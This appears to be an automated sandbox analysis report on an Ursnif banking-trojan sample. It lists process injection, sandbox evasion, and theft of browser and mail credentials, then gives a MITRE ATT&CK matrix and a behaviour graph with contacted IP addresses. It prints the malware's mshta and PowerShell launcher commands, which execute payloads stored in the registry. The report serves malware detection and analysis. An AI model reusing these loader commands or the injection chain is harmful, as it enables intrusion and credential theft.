            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: PhysicalDrive0
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A842B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
            Source: explorer.exe, 0000001E.00000000.437556746.0000000008C73000.00000004.00000001.sdmpBinary or memory string: 30d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
            Source: explorer.exe, 0000001E.00000002.527114908.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: mshta.exe, 00000015.00000002.387243962.000001AB9F6F5000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[h
            Source: explorer.exe, 0000001E.00000000.437180572.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
            Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
            Source: explorer.exe, 0000001E.00000000.437180572.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 0000001E.00000000.433905320.00000000069DB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
            Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0493009C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04930476 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_049303AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Allocates memory in foreign processesShow sources
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26754260000 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2433E7D0000 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 24E31E50000 protect: page execute and read and write
            Changes memory attributes in foreign processes to executable or writableShow sources
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFFAE131580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFFAE131580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFFAE131580 protect: page execute read
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
            Compiles code for process injection (via .Net compiler)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.0.cs
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: AE131580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: AE131580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: AE131580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: AE131580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: AE131580
            Source: C:\Windows\System32\control.exeThread created: unknown EIP: AE131580
            Injects code into the Windows Explorer (explorer.exe)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3292 base: CF2000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3292 base: 7FFFAE131580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3292 base: 2FC0000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3292 base: 7FFFAE131580 value: 40
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 6968
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3292
            Source: C:\Windows\explorer.exeThread register set: target process: 3088
            Source: C:\Windows\explorer.exeThread register set: target process: 3756
            Source: C:\Windows\explorer.exeThread register set: target process: 4396
            Source: C:\Windows\explorer.exeThread register set: target process: 5804
            Source: C:\Windows\explorer.exeThread register set: target process: 6208
            Source: C:\Windows\System32\control.exeThread register set: target process: 3292
            Source: C:\Windows\System32\control.exeThread register set: target process: 7012
            Writes to foreign memory regionsShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7172F12E0
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7172F12E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: CF2000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFFAE131580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2FC0000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFFAE131580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B48A8F9000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26754260000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 943186B000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2433E7D0000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF7FDC65FD0
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 24E31E50000
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF7FDC65FD0
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP'
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
            Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
            Source: explorer.exe, 0000001E.00000000.433237497.0000000005F40000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
            Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000001E.00000000.437180572.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A85F3A cpuid
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A86204 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A85F3A RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A83C98 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6968, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6968, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsProcess Injection812DLL Side-Loading1Credential API Hooking3Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsPowerShell1Logon Script (Windows)Logon Script (Windows)Rootkit4Input Capture1File and Directory Discovery2SMB/Windows Admin SharesEmail Collection11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSystem Information Discovery36Distributed Component Object ModelCredential API Hooking3Scheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion5LSA SecretsQuery Registry1SSHInput Capture1Data Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection812Cached Domain CredentialsSecurity Software Discovery31VNCClipboard Data1Exfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncVirtualization/Sandbox Evasion5Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 322748 Sample: vnaSKDMnLG Startdate: 25/11/2020 Architecture: WINDOWS Score: 100 83 resolver1.opendns.com 2->83 107 Found malware configuration 2->107 109 Antivirus / Scanner detection for submitted sample 2->109 111 Multi AV Scanner detection for submitted file 2->111 113 10 other signatures 2->113 10 mshta.exe 2->10         started        13 loaddll32.exe 1 2->13         started        signatures3 process4 signatures5 129 Suspicious powershell command line found 10->129 15 powershell.exe 10->15         started        19 regsvr32.exe 8 13->19         started        21 cmd.exe 1 13->21         started        process6 file7 65 C:\Users\user\AppData\...\q3xypckz.cmdline, UTF-8 15->65 dropped 67 C:\Users\user\AppData\Local\...\chv50z53.0.cs, UTF-8 15->67 dropped 91 Injects code into the Windows Explorer (explorer.exe) 15->91 93 Writes to foreign memory regions 15->93 95 Modifies the context of a thread in another process (thread injection) 15->95 105 2 other signatures 15->105 23 explorer.exe 15->23 injected 27 csc.exe 15->27         started        30 csc.exe 15->30         started        32 conhost.exe 15->32         started        97 Maps a DLL or memory area into another process 19->97 99 Writes or reads registry keys via WMI 19->99 101 Writes registry values via WMI 19->101 103 Creates a COM Internet Explorer object 19->103 34 control.exe 19->34         started        36 WerFault.exe 19->36         started        38 iexplore.exe 2 65 21->38         started        signatures8 process9 dnsIp10 85 63.250.47.200, 49771, 80 NAMECHEAP-NETUS United States 23->85 87 162.0.213.229, 443, 49776, 49778 ACPCA Canada 23->87 115 Tries to steal Mail credentials (via file access) 23->115 117 Changes memory attributes in foreign processes to executable or writable 23->117 119 Tries to harvest and steal browser information (history, passwords, etc) 23->119 127 3 other signatures 23->127 40 cmd.exe 23->40         